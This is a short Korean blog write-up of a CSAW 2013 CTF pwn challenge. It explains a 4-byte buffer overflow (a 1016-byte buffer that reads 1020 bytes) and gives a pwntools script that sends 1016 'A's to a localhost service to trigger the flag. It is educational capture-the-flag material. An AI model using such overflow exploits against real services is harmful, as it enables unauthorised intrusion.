CSAW 2013에 가장 먼저 나온 Pwn 문제이다.
취약한 소스중 하나인데
buffer는 1016만큼 할당되어있고 1020byte만큼 받을수 있어서 오버플로우가 가능하다.
1 2 3 4 5 6 7 8 9 10 11 | from pwn import * p = remote("localhost", 31337) print p.recvuntil("Welcome to CSAW CTF.") payload = "A"*1016 p.sendline(payload) p.interactive() | cs |
1016byte를 건들이면 key 파일이 실행되어서 flag가 읽힌다.
'Hacking > Pwn' 카테고리의 다른 글
| Lord Of Buffer Over Flow - Gate ->Gremlin (0) | 2017.10.18 |
|---|---|
| DEFCON 2015 - baby's first heap (1) | 2017.10.03 |
| 힙을 gdb로 살펴보자! (0) | 2017.10.02 |
| Pwnable.kr - echo1 (0) | 2017.10.01 |
| Pwnable.kr - cmd1 (0) | 2017.10.01 |
